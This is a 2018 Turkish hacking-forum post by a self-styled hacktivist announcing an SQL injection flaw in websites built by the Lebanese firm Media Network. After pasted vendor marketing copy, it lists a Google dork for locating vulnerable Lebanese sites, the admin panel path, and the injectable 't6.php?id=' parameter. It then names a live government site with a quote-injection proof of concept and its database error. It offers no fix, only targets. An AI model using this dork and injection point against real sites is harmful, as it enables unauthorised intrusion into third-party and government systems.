Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Powered by Media Network Lebanon SQL Injection Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,372 / 1,372
Deneyim: 91 / 100
Rep Sayısı: 2769
Mesaj Sayısı: 6325
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Powered by Media Network Lebanon SQL Injection Vuln
01.10.2018 09:28
################################################################################​#################

# Exploit Title : Powered by Media Network Lebanon SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/10/2018
# Vendor Homepage : medianetworkcc.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

################################################################################​#################

# Description of the Product for the Medinetworkcc Web Design Company =>

They Say ; Media Network Company is an Information Technology Business Solutions provider that was founded in the year 2002
by a group of people who set a vision and followed it through by high levels of determination and inspiration.
When Media Network first started, it was one of the first regional providers of web solutions and was able to prove itself as
a reliable business partner. Today, company and colleagues are leaders in the various aspects of enterprise solutions from
initial strategic consulting, through development, implementation, project management, and training.

Currently, Media Network ranks among the top regional IT enterprise solutions providers.
Our approach begins by understanding the needs and concerns of our clients not only on a technological level
but just as well on the business level. Our industry expertise helps us better advise our clients regarding their
IT Business Strategy. Our mission is to put the latest technology to work for the growth of our clients.

With more than 1000 projects in our basket, Media Network offers a unique blend of strategic, creative and technical skills.
Combine these attributes with our pragmatic approach and commitment to quality and you will understand why
so many small, medium and large enterprises select us as their business partner. Our approach revolves
around 3 main pillars, customer, partner, and employee.
This is the reason for our success.

When Media Network first started in 2002, our coverage area was quite modest.
This day, Media Network truly has world-wide coverage with clients all over the globe and
branches in Beirut, Qatar, KSA- Jeddah, and many more to come in the near future.

################################################################################​#################

# Google Dork :

intext:Powered by Media Network'' site:lb

# Admin Control Panel Path :

/admin/

# SQL Injection Exploit :

/t6.php?id=[SQL Injection]

################################################################################​#################

# Example Vulnerable Site => nabatieh.gov.lb/t6.php?id=34%27 => [ Proof of Concept ] => archive.fo/Pl8C0

# SQL Database Error =>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
right syntax to use near '' ORDER BY news_date DESC LIMIT 0, 30' at line

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti



1 Ziyaretçi